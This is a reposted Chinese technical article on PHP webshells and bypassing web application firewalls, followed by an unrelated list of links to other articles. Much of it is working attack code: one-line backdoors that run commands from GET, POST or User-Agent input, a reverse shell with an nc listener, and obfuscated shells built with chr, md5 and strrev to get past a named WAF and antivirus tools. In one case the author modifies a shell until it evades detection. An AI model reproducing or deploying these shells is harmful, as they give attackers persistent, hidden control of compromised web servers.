php 绕waf,【技术分享】php webshell分析和绕过waf技巧

85083

作者:阻圣

预估稿费:400RMB(不服你也来投稿啊!)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

前言

WebShell是攻击者使用的恶意脚本,它的用途主要是在攻击后的Web应用程序上建立持久性的后门。webshell本身不能攻击或者利用远程漏洞,所以说它总是攻击的第二阶段,这个阶段我们经常称为post-exploitation。(PS:Post Exploitation是国外渗透测试标准里面的一个阶段)

WebShell常用函数

现在的Web应用程序基本上是采用PHP开发的,所以本篇文章也主要介绍的是php环境下的WebShell。WebShell无非就是使用PHP内置的函数来执行命令,以下就是用于在php中执行shell命令的一些最常用的函数。

system()

system()函数接收命令作为参数,并输出结果。

以下示例演示了运行dir命令,显示执行php文件目录的目录列表:

system('dir');

?>

-->

驱动器 C 中的卷没有标签。 卷的序列号是 7C53-7529 C:phpstudyWWW 的目录 2016-12-02 15:39

. 2016-12-02 15:39

.. 2016-12-02 15:38 56 hello.php 2016-12-02 15:38 29 system.php 2016-12-02 15:39

test 2 个文件 85 字节 3 个目录 871,600,128 可用字节

exec()

exec()函数接收一个命令作为参数,当不输出结果,如果指定第二个可选参数,则结果将作为数组返回。否则,如果回显,将只显示结果的最后一行。

exec('dir')

?>

-->

我们可以使用echo来输出exec()函数的结果。可以发现只有结果的最后一行。

echo exec('dir');

?>

-->

3 个目录 871,538,688 可用字节

如果指定第二个参数,则在数组中返回结果。

echo exec('dir',$array);

print_r($array);

?>

-->

3 个目录 871,538,688 可用字节Array ( [0] => 驱动器 C 中的卷没有标签。 [1] => 卷的序列号是 7C53-7529 [2] => [3] => C:phpstudyWWW 的目录 [4] => [5] => 2016-12-02 15:52

. [6] => 2016-12-02 15:52

.. [7] => 2016-12-02 16:15 53 exec.php [8] => 2016-12-02 15:38 56 hello.php [9] => 2016-12-02 15:46 25 system.php [10] => 2016-12-02 15:39

test [11] => 3 个文件 134 字节 [12] => 3 个目录 871,538,688 可用字节 )

shell_exec()

shell_exec()函数类似于exec()函数,但不同的是,它会将整个结果作为字符串输出。

echo shell_exec('dir');

?>

-->

驱动器 C 中的卷没有标签。 卷的序列号是 7C53-7529 C:phpstudyWWW 的目录 2016-12-02 16:26

. 2016-12-02 16:26

.. 2016-12-02 16:15 53 exec.php 2016-12-02 15:38 56 hello.php 2016-12-02 16:27 34 shellexec.php 2016-12-02 15:46 25 system.php 2016-12-02 15:39

test 4 个文件 168 字节 3 个目录 871,460,864 可用字节

passthru()

passthru()函数执行命令并返回输出。

passthru('dir');

?>

-->

驱动器 C 中的卷没有标签。 卷的序列号是 7C53-7529 C:phpstudyWWW 的目录 2016-12-02 16:35

. 2016-12-02 16:35

.. 2016-12-02 16:15 53 exec.php 2016-12-02 15:38 56 hello.php 2016-12-02 16:35 27 passthru.php 2016-12-02 16:27 34 shellexec.php 2016-12-02 15:46 25 system.php 2016-12-02 15:39

test 5 个文件 195 字节 3 个目录 871,456,768 可用字节

proc_open()

proc_open()函数执行一个命令,并且打开用来输入/输出的文件指针。

这个函数可能很难理解,简单的来说,通过使用proc_open()函数,我们可以创建一个进程用于我们的脚本和我们想要运行程序之间的通信。详见PHP文档:

preg_replace()与/e修饰符

preg_replace()函数可以执行正则表达式的搜索和替换

如果使用/e修饰符,意味着使用eval执行替换,这样我们就可以传递一个要由eval()函数执行的代码

preg_replace('/.*/e', 'system("net user");', '');

?>

-->

\ 的用户帐户 ------------------------------------------------------------------------------- Administrator ASPNET Guest HelpAssistant SUPPORT_388945a0 命令运行完毕,但发生一个或多个错误。

反引号

肯定很多人没有注意到这点吧,php将反引号的内容作为shell命令执行。

$string=`$_GET[id]`;

echo "

$string
";

?>

结果:

85083

某WAF也没扫描到:

85083

隐藏WebShell-免杀之路

利用HTTP请求头

在php中,我们可以很容易获取到HTTP请求头里面的某些特殊字符串头,比如User-Agent。同样的原理,我也可以利用这个来传入需要执行的命令。

通过User-Agent传入命令执行:

85083

某waf也是扫描到,当然除了User-Agent,我们还有Accept-Language等特殊字符串头,这里就不做演示了,主要的还是方法。

混淆技术

上面的方法虽然过了waf,但是我们人工一看就知道有问题,所以我们还需要一些混淆技术来隐藏webshell。首先我们来认识一下几个常用功能。

eval() :把字符串作为PHP代码执行

assert() :判断一个表达式是否成立,直接传入字符串会当做 PHP 代码来执行

base64() :使用base64对数据进行编码

gzdeflate() :对数据进行Deflate压缩,gzinflate()解压缩

str_rot13() :对字符串执行 ROT13 转换

回调函数

这种办法国内我是看了phithon的介绍,不过这里我肯定要介绍是最新能绕waf的函数。

create_function()

$args = "hui";

$code = "a;}$_POST['bar'];/*";

echo create_function('$args',$code);

?>

这样构造可以把前面的函数体闭合,再把后面的注释掉,这样就相当于执行了。

eval($_POST[bar])

使用system函数执行net user命令:

85083

反弹shell

这里给大家介绍一个php反弹shell的脚本。

使用方法:

第一步,填写需要反弹到的IP地址和端口以及需要执行的shell命令。

$ip = '127.0.0.1';  // IP地址

$port = 1234;       // 端口

$shell = 'net user'; //需要执行的命令

然后我使用nc监听端口1234:

nc -v -n -l -p 1234

访问php文件后,查看nc监听结果,发现命令成功执行,结果反弹。

85083

waf没有扫描到。

那些年强悍的WebShell分析

在Github上有个项目收集了很多的WebShell,这里我们拿出几个我认为比较强悍的webshell分析一下。

利用404页面隐藏PHP木马

webshell/php/404.php

这里主要的代码如下:

eval(gzinflate(base64_decode($code)));

木马代码被编码压缩在$code变量中,验证密码是否正确,正确就解压执行,这里密码经过了三次md5加密。

85083

过某waf的webshell

webshell/php/bypass-safedog-2016-08-29.php

$a=md5('a').'
';

$poc=substr($a,14,1).chr(115).chr(115).substr($a,22,1).chr(114).chr(116);

$poc($_GET['a']);

?>

利用a的md5值取出了a和e,配合chr函数,构造出assert。

利用演示:

85083

zone_hackbar.php

webshell/php/zone_hackbar.php

$sF="PCT4BA6ODSE_";

$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);

$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];

if(isset($s22)){eval($s21($s22));}

?>

这个webshell也是通过隐藏关键字,$s21就是base64解密函数,$s22就是接收POST数据。不过某waf对eval可是很敏感的,直接报警。

85083

不要紧,我们修改一下就可以了,用assert,不需要base64加密了。

$sF="PCT4BA6ODSE_";

$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];

if(isset($s22)){assert($s22);}

?>

这次就没有扫描到了,看看使用有没有错。

85083

过各大杀软的pHp一句话

webshell/php/过各大杀软的pHp一句话.php

$_uU=chr(99).chr(104).chr(114);

$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);

$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);

$_=$_fF("",$_cC);@$_();

?>

看起来没什么,其实就是先构造了chr这个字符串,然后利用chr函数分别构造了eval($_POST[1]);和create_function。

最后就是执行:

create_function("",eval($_POST[1]););

不过现在某waf对chr可是很敏感滴。立马被拦截了。

最新过某waf一句话

这个是我在互联网上看见的,其实和回调函数差不多,拿来分析一下吧。

error_reporting(0);

$b="zxczxczxczxczxcxzczx";

function yuag_array($b,$c){

$b=strrev($b);

array_map(substr_replace($b, 'ss', 1, 0),array($c));

}

yuag_array("trea",$_POST['yuag']);

?>

先是构造了一个函数yuag_array,然后传入了两个参数,经过反转和替换字符串构造出assert。

这样最后执行的就是:

array_map(assert,array($_POST['yuag']));

这里就不再做详细介绍了。

参考文章

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/527732.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

php写好程序后需要嵌套,什么是PHP嵌套函数?

这不仅是副作用,而且实际上是动态修改程序逻辑的非常有用的功能。它来自过程式PHP时代,但如果您想以最直接的方式为某些独立功能提供替代实现,那么它也可以与OO体系结构一起使用。(虽然在大多数情况下,OO是更好的选择,…

java 电子实时看板,看板界面的实现

在系统中有时通过以下界面可以直观的展示信息给用户:以上图形有几点比较重要:1, 一个面板显示一组属性(例如物料显示物料编号、物料规格),但要把最主要的属性通过颜色单独处分出来。2, 通过颜色来区分重要性,例如(红…

java https soap,Java Https Soap Server(Tomcat-Axis2)

1、%Tomcat%/server/server.xml找到下面一段:替换为:maxThreads"150" scheme"https" secure"true"clientAuth"false" sslProtocol"TLS"disableUploadTimeout"true" enableLookups"fal…

php在線評論,php在線生成pdf筆記 | 學步園

準備工作:網上下載fpdf類。網上下載chinese類,此類主要是讓pdf支持中文。實例:require(chinese.php);$pdfnew PDF_Chinese();mysql_connect(localhost,root,fkey);mysql_selectdb(mylib);mysql_query("SET NAMES uft-8");$query m…

php数组能不能静态,php 为什么常量可以用数组定义 静态变量却不能

<?php$GLOBALS[arr] array(1>1,2>2);define("ABC",$GLOBALS[arr][1]); # 这个定义可以class test{static $a $GLOBALS[arr][1]; # 这个初始化有语法错误}类的变量成员叫做“属性”&#xff0c;或者叫“字段”、“特征”&#xff0c;在本文档统一称为“属…

matlab简单程序实例视频,matlab编程实例100例.docx

matlab编程实例100例1-32是&#xff1a;图形应用篇33-66是&#xff1a;界面设计篇67-84是&#xff1a;图形处理篇85-100是&#xff1a;数值分析篇实例1&#xff1a;三角函数曲线(1)function shili01h0figure(toolbar,none,... position,[198 56 350 300],... name,实例01);h1ax…

java.net.url 中文乱码,.Net获取URL中文参数值的乱码问题解决方法总结

本文总结分析了.Net获取URL中文参数值的乱码问题解决方法。分享给大家供大家参考&#xff0c;具体如下&#xff1a;解决方法&#xff1a;1.设置web.config文件2.传递中文之前&#xff0c;将要传递的中文参数进行编码&#xff0c;在接收时再进行解码。string Name "中文参…

php里运行js,在PHP 中运行JS - mickelfeng的个人空间 - OSCHINA - 中文开源技术交流社区...

这天去zend网站上逛了逛&#xff0c; 看到一个monkeyspider 的标签&#xff0c;http://devzone.zend.com/article/4704-Using-JavaScript-in-PHP-with-PECL-and-SpiderMonkey嘿嘿&#xff0c; 原来是用c写了一个扩展php扩展 把spiderMonkey和php 联起来了。 照着试了试&#xf…

oracle asm 分布式存储,分布式数据中心数据库和存储部署解决方案

文/耿加申建设分布式双活数据中心是需要网络系统、存储系统、计算资源甚至包括应用系统等多个IT系统之间紧密合作才能实现的。用户所有的业务系统同时在两个数据中心运行&#xff0c;包括前端的全局负载均衡、服务器前端的负载均衡、服务器集群HA技术&#xff0c;后端的数据库系…

asyncio oracle 异步,带有asyncio futures和RuntimeError的InvalidStateError与aiohttp时使用期货回调...

我是asyncio和aiohttp新手。我目前得到这个错误&#xff0c;不知道为什么我收到InvalidStateError我asyncio未来RuntimeError为我的会议&#xff1a;带有asyncio futures和RuntimeError的InvalidStateError与aiohttp时使用期货回调Traceback (most recent call last):File &quo…

oracle中存储过程可见权限,Oracle数据库存储过程与权限

在执行存储过程时&#xff0c;我们可能会遇到权限问题 ● 定义者权限存储过程 ● 调用者权限存储过程 在数据库中创建存储过程时&#xff0c;定义者权限是缺省模式 当指定AUTHID CURRENT_USER关键字后&#xff0c;便是调用者权限存储过程 他俩之间最根本的差异在于role能否在存…

oracle无效的十六进制数字,值java.sql.SQLException:ORA-01465:无效的十六进制数

我想这private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {try {// TODO add your handling code here:captureScreen("img.jpg");} catch (Exception ex) {Logger.getLogger(frontendUI.class.getName()).log(Level.SEVERE, null, ex);}try {C…

oracle实例是否有dbid,Oracle如何获得数据库的DBID

Oracle如何获得数据库的DBID在进行数据库恢复的过程中,很多时候我们需要知道Oracle数据库的DBID,通常有以下几种方法可以获得数据库的DBID.法&#xff11;:在命令行下C:\Documents and Settings\zhhs>rman target /恢复管理器: 版本9.2.0.7.0 - ProductionCopyright (c) 199…

magento php 所需模块,magento博客 - Magento2 创建基本模块

我们将在Magento 2中创建一个简单的模块&#xff0c;完成后&#xff0c;模块将在自定义前端路由的内容中显示“Hello world&#xff01;”。先决条件毋庸置疑&#xff0c;您需要最新的Magento 2版本在我们开始Magento 2模块开发之前&#xff0c;有两件事是人们经常忘记的&#…

对象工厂PHP,php – 域对象工厂是什么样的?

通常,您可以使用工厂从特定实现中抽象出来.如果您使用新的< classname>运算符,每次都实例化一个特定的类.如果要在以后将此类与其他实现交换,则必须手动更改每个新语句.工厂模式允许您从特定类中抽象.有效的最小用例可能是这样的&#xff1a;interface UserInterface {pu…

手机安装linux不root权限管理,不root手机也能使用linux环境并安装msf等工具

抵挡不住物理键盘的诱惑在key2首发的时候下手了。黑莓的天性&#xff0c;不能root。之前用nexus习惯用linux deploy搭建的kali环境需要root权限&#xff0c;所以虽然key2敲命令很爽&#xff0c;但是不能使用linux deploy真的很可惜。然后找到了termux这个轻量化的神器。无需roo…

a33 linux内核启动网卡,a33核心板启动问题 - nevermore1981的个人空间 - OSCHINA - 中文开源技术交流社区...

测试发现a33核心板有时无法正常启动&#xff0c;通过串口信息显示判断是uboot 对mmc初始化有时会出现问题&#xff1a;[ 0.770][mmc]: ************Try MMC card 2************[ 0.796][mmc]: mmc 2 2xmode config clk[ 0.806][mmc]: mmc 2 data timeout 80[ …

linux查看机器配置命令,linux 下查看机器配置的几个命令

查看硬盘信息&#xff1a;dmesg |grep hdusernamenode01:~> dmesg|grephdactivating NMI Watchdog ... done.testing NMI watchdog ... OK.SCSI device sda: 286748000 512-byte hdwr sectors(146815 MB)SCSI device sda: 286748000 512-byte hdwr sectors(146815 MB)SCSI d…

linux中group命令详解,linux groupmod命令参数及用法详解

需要更改群组的识别码或名称时&#xff0c;可用groupmod指令来完成这项工作。接下来是小编为大家收集的linux groupmod命令参数及用法详解&#xff0c;希望能帮到大家。linux groupmod命令参数及用法详解groupmod(group modify)功能说明&#xff1a;更改群组识别码或名称。语 …

Linux能适应不同的指令集,(转)linux常用指令集

转自: https://blog.csdn.net/itachi85/article/details/68194801.文件目录操作命令ls显示文件和目录列表-l列出文件的详细信息-a列出当前目录所有文件&#xff0c;包含隐藏文件mkdir创建目录-p父目录不存在情况下先生成父目录cd切换目录touch生成一个空文件echo生成一个带内容…